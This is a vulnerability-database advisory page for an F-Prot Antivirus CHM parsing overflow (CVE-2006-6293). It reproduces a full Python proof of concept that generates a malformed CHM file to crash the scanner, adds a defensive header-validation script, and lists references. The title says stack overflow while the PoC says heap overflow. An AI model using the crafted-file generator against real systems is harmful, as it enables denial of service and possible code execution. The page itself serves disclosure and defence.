FRISK Software F-Prot Antivirus CHM File Stack Buffer Overflow Vulnerability

Vulnerability ID: 1111719    Vulnerability type: Buffer overflow
Published: 2006-12-04    Updated: 2006-12-08
CVE: CVE-2006-6293    CNNVD ID: CNNVD-200612-075
Platform: Linux    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2893
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-075
|Vulnerability details
FRISK Software F-Prot Antivirus contains a stack buffer overflow; a user-assisted remote attacker can execute arbitrary code via a specially crafted CHM file.
|Vulnerability EXP
# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm

import sys
import struct

s = b""
s += b"ITSF"                                # signature
s += struct.pack("<L", 3)                   # version
s += struct.pack("<L", 96)                  # header_len
s += struct.pack("<L", 1)                   # unknown
s += struct.pack("<L", 0x41424344)          # last_modified
s += struct.pack("<L", 0x419)               # lang_id
s += b"A" * 16                              # dir_clsid
s += b"B" * 16                              # stream_clsid
s += struct.pack("<L", 96) + b"\x00" * 4    # sec0_offset (64-bit field)
s += struct.pack("<L", 24) + b"\x00" * 4    # sec0_len
s += struct.pack("<L", 120) + b"\x00" * 4   # dir_offset
s += struct.pack("<L", 4180) + b"\x00" * 4  # dir_len
s += struct.pack("<L", 4300) + b"\x00" * 4  # data_offset
s += b"A" * 24                              # header section 0
s += b"ITSP"                                # directory header signature
s += struct.pack("<L", 1)                   # version
s += struct.pack("<L", 0x54)                # header_len
s += struct.pack("<L", 0xa)                 # unknown
s += struct.pack("<L", 1000)                # block_len - BUG?
s += struct.pack("<L", 2)                   # blockidx
s += struct.pack("<L", 1)                   # index_depth
s += struct.pack("<l", -1)                  # index_root (signed pack; "<L" rejects -1)
s += struct.pack("<L", 0)                   # index_head
s += struct.pack("<L", 0)                   # index_tail
s += struct.pack("<l", -1)                  # unknown2 (signed pack, as above)
s += struct.pack("<L", 1)                   # num_blocks
s += struct.pack("<L", 1033)                # lang_id
s += b"A" * 32                              # remainder of the 0x54-byte ITSP header
s += b"B" * 10000                           # oversized directory payload

# Python 3: write raw bytes so no text encoding alters the output file
sys.stdout.buffer.write(s)

# milw0rm.com [2006-12-04]
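As an added defensive example (not part of the exploit-db entry above and not F-Prot's own code), the following Python 3 checker parses the same ITSF/ITSP header layout the PoC writes and rejects a file whose section spans fall outside the file or whose directory chunk geometry is internally inconsistent. Field names follow the PoC's comments; the rule that dir_len must equal the ITSP header length plus num_blocks * block_len, the cap on block_len, and the headers produced by build_sample are this example's own assumptions. The page does not say which field F-Prot mishandled, only that a crafted CHM overflows a buffer.

```python
import struct

ITSF_HEADER_LEN = 96     # version-3 ITSF header, the layout the PoC writes
ITSP_HEADER_LEN = 0x54   # ITSP (directory) header, the layout the PoC writes
SECTION0_LEN = 24        # size of header section 0 in the PoC's layout
MAX_BLOCK_LEN = 0x10000  # example policy (assumption): refuse absurd chunk sizes


class ChmFormatError(ValueError):
    """Raised when a CHM header fails a structural consistency check."""


def _span_ok(off, length, total):
    # Python ints never wrap; a C parser must also guard off + length overflow.
    return 0 <= off and 0 <= length and off + length <= total


def parse_itsf(buf):
    """Parse and validate the 96-byte ITSF header; return its section table."""
    if len(buf) < ITSF_HEADER_LEN:
        raise ChmFormatError("file shorter than ITSF header")
    sig, version, header_len = struct.unpack_from("<4sLL", buf, 0)
    if sig != b"ITSF":
        raise ChmFormatError("bad ITSF signature")
    if version != 3 or header_len != ITSF_HEADER_LEN:
        raise ChmFormatError("unsupported ITSF version or header length")
    # bytes 12..24: unknown, last_modified, lang_id; 24..56: the two CLSIDs
    sec0_off, sec0_len, dir_off, dir_len, data_off = struct.unpack_from("<5Q", buf, 56)
    for name, off, length in (("section0", sec0_off, sec0_len), ("directory", dir_off, dir_len)):
        if off < header_len or not _span_ok(off, length, len(buf)):
            raise ChmFormatError("%s span [%d, +%d) outside file of %d bytes"
                                 % (name, off, length, len(buf)))
    if data_off > len(buf):
        raise ChmFormatError("data offset beyond end of file")
    return {"sec0": (sec0_off, sec0_len), "dir": (dir_off, dir_len), "data_off": data_off}


def parse_itsp(buf, dir_off, dir_len):
    """Parse the ITSP header and check its chunk geometry against dir_len."""
    if dir_len < ITSP_HEADER_LEN:
        raise ChmFormatError("directory shorter than ITSP header")
    (sig, version, header_len, _unk, block_len, _blockidx, index_depth,
     index_root, _index_head, _index_tail, _unk2, num_blocks, _lang_id) = \
        struct.unpack_from("<4sLLLLLLlLLlLL", buf, dir_off)
    if sig != b"ITSP":
        raise ChmFormatError("bad ITSP signature")
    if version != 1 or header_len != ITSP_HEADER_LEN:
        raise ChmFormatError("unsupported ITSP version or header length")
    if not 0 < block_len <= MAX_BLOCK_LEN:
        raise ChmFormatError("directory block_len %d out of policy range" % block_len)
    # Example policy: the directory is exactly the header plus num_blocks chunks
    # of block_len bytes. A header that declares one geometry in dir_len and
    # another in block_len (as the PoC above does) is rejected here.
    expected = header_len + num_blocks * block_len
    if expected != dir_len:
        raise ChmFormatError("dir_len %d != header %d + %d blocks * %d"
                             % (dir_len, header_len, num_blocks, block_len))
    if index_depth == 1:
        if index_root != -1:
            raise ChmFormatError("index_root must be -1 for a single-level directory")
    elif not 0 <= index_root < num_blocks:
        raise ChmFormatError("index_root %d outside block range" % index_root)
    return {"block_len": block_len, "num_blocks": num_blocks, "index_depth": index_depth}


def check_chm(buf):
    """Return (True, summary) for a consistent CHM header pair, else (False, reason)."""
    try:
        itsf = parse_itsf(buf)
        itsp = parse_itsp(buf, *itsf["dir"])
    except (ChmFormatError, struct.error) as exc:
        return False, str(exc)
    return True, "%d directory chunk(s) of %d bytes" % (itsp["num_blocks"], itsp["block_len"])


def build_sample(block_len, num_blocks, declared_block_len=None):
    """Constructed sample input: ITSF + section 0 + ITSP + num_blocks empty chunks.
    declared_block_len makes the ITSP header disagree with dir_len (as the PoC does)."""
    dir_len = ITSP_HEADER_LEN + num_blocks * block_len
    dir_off = ITSF_HEADER_LEN + SECTION0_LEN
    data_off = dir_off + dir_len
    itsf = b"ITSF" + struct.pack("<LLLLL", 3, ITSF_HEADER_LEN, 1, 0, 0x409)
    itsf += b"\x00" * 32  # dir_clsid, stream_clsid
    itsf += struct.pack("<5Q", ITSF_HEADER_LEN, SECTION0_LEN, dir_off, dir_len, data_off)
    shown = block_len if declared_block_len is None else declared_block_len
    itsp = b"ITSP" + struct.pack("<LLLLLLlLLlLL", 1, ITSP_HEADER_LEN, 0xa, shown,
                                 2, 1, -1, 0, 0, -1, num_blocks, 0x409)
    itsp += b"\x00" * 32  # system GUID and trailing header fields
    return itsf + b"\x00" * SECTION0_LEN + itsp + b"\x00" * (num_blocks * block_len)


if __name__ == "__main__":
    for label, sample in (("consistent header", build_sample(4096, 1)),
                          ("PoC-style block_len", build_sample(4096, 1, declared_block_len=1000))):
        ok, why = check_chm(sample)
        print("%s: %s (%s)" % (label, "accept" if ok else "reject", why))
```

Run stand-alone it accepts a header whose lengths agree and rejects one whose block_len contradicts dir_len the way the PoC's does. The point for anyone writing a file-format scanner is that every length and offset read from the file is checked against the file size and against the other declared lengths before it is used to size or fill a buffer; in C the off + length and num_blocks * block_len arithmetic must additionally be checked for integer wraparound.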
|References

Source: BID
Name: 21086
Link: http://www.securityfocus.com/bid/21086
Source: BUGTRAQ
Name: 20061204 F-Prot Antivirus for Unix: heap overflow and Denial of Service
Link: http://www.securityfocus.com/archive/1/archive/1/453475/100/0/threaded
Source: OSVDB
Name: 30406
Link: http://www.osvdb.org/30406
Source: MILW0RM
Name: 2893
Link: http://www.milw0rm.com/exploits/2893
Source: VUPEN
Name: ADV-2006-4830
Link: http://www.frsirt.com/english/advisories/2006/4830
Source: www.f-prot.com
Link: http://www.f-prot.com/news/gen_news/061201_release_unix467.html
Source: SECTRACK
Name: 1017331
Link: http://securitytracker.com/id?1017331
Source: SECUNIA
Name: 22879
Link: http://secunia.com/advisories/22879
Source: FULLDISC
Name: 20061204 F-Prot Antivirus for Unix: heap overflow and Denial of Service
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051096.html
Source: MISC
Link: http://gleg.net/vulndisco_meta.shtml
Source: MISC
Link: http://gleg.net/fprot.txt
Source: GENTOO
Name: GLSA-200612-12
Link: http://security.gentoo.org/glsa/glsa-200612-12.xml
Source: SECUNIA
Name: 23328
Link: http://secunia.com/advisories/23328
Source: MILW0RM
Name: